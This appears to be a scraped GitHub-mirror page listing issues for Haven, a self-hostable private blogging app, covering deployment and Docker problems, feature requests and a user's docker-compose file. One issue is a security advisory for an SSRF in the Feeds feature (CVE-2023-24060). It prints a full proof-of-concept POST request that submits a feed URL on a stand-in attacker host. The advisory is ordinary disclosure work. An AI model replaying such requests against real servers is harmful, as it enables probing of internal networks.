havenweb / haven Goto Github PK
View Code? Open in Web Editor NEWSelf-hostable private blogging
Home Page: https://havenweb.org
License: MIT License
Self-hostable private blogging
Home Page: https://havenweb.org
License: MIT License
[DEPRECATED] The `--deployment` flag is deprecated because it relies on being remembered across bundler invocations, which bundler will no longer do in future versions. Instead please use `bundle config set --local deployment 'true'`, and stop using this flag
[DEPRECATED] The `--without` flag is deprecated because it relies on being remembered across bundler invocations, which bundler will no longer do in future versions. Instead please use `bundle config set --local without 'development test'`, and stop using this flag
Check various deployment scripts, ensure we're using the correct setting.
Hey there!
I belong to an open source security research community, and a member (@vanlan12) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md
file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
There's a few configuration options on nginx (and I'm certain a few others as well), that need to be set up, due to the redirects that the application is performing. A few lines of "maybe you need these options on nginx" would fit in?
This is a suggestion and not related to the code. By adding tag other people could also find this project by topics. (BTW I found this via HN).
For the tags, I suggest the followings (obvious) tags
Right now, there is no seed data, which makes developing just a bit more difficult, since an user needs to be created before you can login. There should be some seed data to make development a little bit easier.
The db/seeds.rb
file can be used to accommodate this.
hi
im getting the following when running the docker compose file
[haven 7/13] RUN APT update:
0.345 /bin/sh: 1: APT: not found
failed to solve: process "/bin/sh -c APT update" did not complete successfully: exit code: 127
This is after 2-3 minutes of building, then this error and stops.
Is this a known issues or something someone as seen before? Thanks!
There seems to be quite a lack of tests. Increasing the test coverage not only increases developer confidence when building new stuff (the old stuff will not break), but it also documents the expected behaviour.
By default uses Minitest, but we could make the argument that RSpec is also a fine choice, because it is arguably better readable.
Started through docker_compose
(see below) and after first login it was a 500 error.
Reading the production.log (inside the container) it was missing @setting
so I run Setting.create
and it worked.
version: '3.7'
services:
haven:
container_name: 'haven-blog'
image: ghcr.io/havenweb/haven:22dc990
depends_on:
- postgresql
ports:
- "5030:3000"
volumes:
- $BASE_FOLDER_DOCKER/haven_storage:/storage
environment:
- RAILS_ENV=production
- HAVEN_DB_HOST=postgresql
- HAVEN_DB_NAME=haven
- HAVEN_DB_ROLE=haven
- HAVEN_DB_PASSWORD=$HAVEN_DB_PASSWORD
- HAVEN_USER_EMAIL=$HAVEN_USER_EMAIL
- HAVEN_USER_PASS=$HAVEN_USER_PASS
postgresql:
image: postgres:13.2-alpine
ports:
- "5432:5432"
# https://www.postgresql.org/docs/current/static/non-durability.html
command: [
"postgres",
"-c", "max_connections=1000",
"-c", "synchronous_commit=off",
"-c", "fsync=off",
"-c", "full_page_writes=off",
"-c", "max_wal_size=4GB",
"-c", "checkpoint_timeout=30min",
"-c", "wal_level=logical"
]
environment:
POSTGRES_HOST_AUTH_METHOD: trust
POSTGRES_USER: haven
volumes:
- $BASE_FOLDER_DOCKER/postgresqldata:/var/lib/postgresql/data
volumes:
postgresqldata:
external: false
haven_storage:
external: false
How to deploy this on own server? Not on AWS, not on a Pi, just on a regular Linux VM. Thanks!
It would be great to be able to customize the favicon by uploading a new image.
When viewing on mobile, the links are stacking instead of converting to a hamburger menu. It's a bit cluttered in the header due to this.
Using an iPhone 12 Pro Max.
A Security Advisory has been raised for Haven v5d15944 (CVE-2023-24060):
Description:
Haven v5d15944 allows Server-Side Request Forgery (SSRF) via the Feeds functionality.
Malicious authenticated users with the ability to create or add RSS Feeds to the website can supply an arbitrary host such as the host itself in an attempt to scan the internal network.
Affected URL (Parameter):
http://localhost:3000/feeds (url)
Suggested Fix:
Consider performing this action on the client-side. There's no need for the server to fetch the RSS feed, have the user's browser fetch the latest feed when loading the page. This would also remove the need to have a script that will execute every so often to update the RSS feed.
Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24060
https://nvd.nist.gov/vuln/detail/CVE-2023-24060
https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
Payload:
POST /feeds HTTP/1.1
Host: localhost:3000
Content-Length: 203
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Cookie: _blog_session=[]
Connection: close
utf8=%E2%9C%93&authenticity_token=[]&feed%5Burl%5D=https%3A%2F%2Fattacker.com%2Frss&commit=Add+Feed
Hello, good day, I am trying to get Haven to work with the deploy-pi.sh script, however, I have some doubts, I have my own reverse proxy to expose the server to the internet, which part of the script would I have to delete for everything to work ok, try removing the parts of:
## HTTPS with Letsencrypt
#Rewrite Apache config to fix http -> https redirect
However, I get a server not available error, could you guide me a little, thanks
Right now, the options for Password are:
This is confusing.
Either the "Change Password" screen should be a sub-menu (different page), or it should at least have its own header, with its own save
button:
save changes
update password
delete account
[custom css to make it red, probably]
I'll update if I find more. If I end up using the site, I may open a PR for some of the above.
I believe the project could greatly benefit from Docker (and compose) support. Making it easier to setup on machines that are not single purpose (like a raspberry pi or AWS instances) can be greatly beneficial in getting a greater adoption for Haven.
We can start with a rough base and refine from there.
It's not specifically stated if this is a goal at all, but is there a way to make posts globally visible? Meaning you don't need a password to see.
For example
blog.domain.com/public
When on https (certificate through certbot), using apache and reverse proxy:
when making some edits such as:
I got this error:
HTTP Origin header (https://blog.<my website obscured name>.com) didn't match request.base_url (http://blog.<my website obscured name>.it)
Do I have to force HTTP instead of HTTPS?
Hi, there's been some pretty great strides in support for IndieAuth Ticket Auth which is a simple mechanism for publishers to provide a bearer authentication token to clients (such as feed readers), which is significantly more secure than private per-user feeds. Are there any plans to support that on the reader and/or publisher side of Haven?
Getting more widespread adoption of this mechanism would be great.
Hello! I'm starting to use Haven finally (we had talked over email before!) and after a pause in using it, and having changed my password, I got locked out. I have no idea how to get the password back (sadly my password manager didn't catch that I changed it) and was wondering if a possible feature to have an email reset the password would be able to be included?
I also was wondering if it would be possible to make the CSS editing a bit easier. I know some CSS/HTML, but I couldn't find an easy guide on how to start editing it as far as CSS classes and such. I know I can inspect element in my browser, but it might be worthwhile to either make note of some tips on styling it, or something along those lines? Especially for people who might not be quite as knowledgeable. If there is a guide somewhere, I apologize! I'm bad at finding things sometimes.
Thank you for your time and I really like the project!
Apologies for any inconveniences caused; posted erroneously.
Do you plan on adding contribution guidelines? I would love to help out where possible if there's a need and/or desire for contributions. If not, no worries. Just wanted to get the conversation going if there's one to be had.
It would be nice if haven would support RTL languages. It means that when you wrote in these languages, then the text will appear from right to left instead from left to right.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.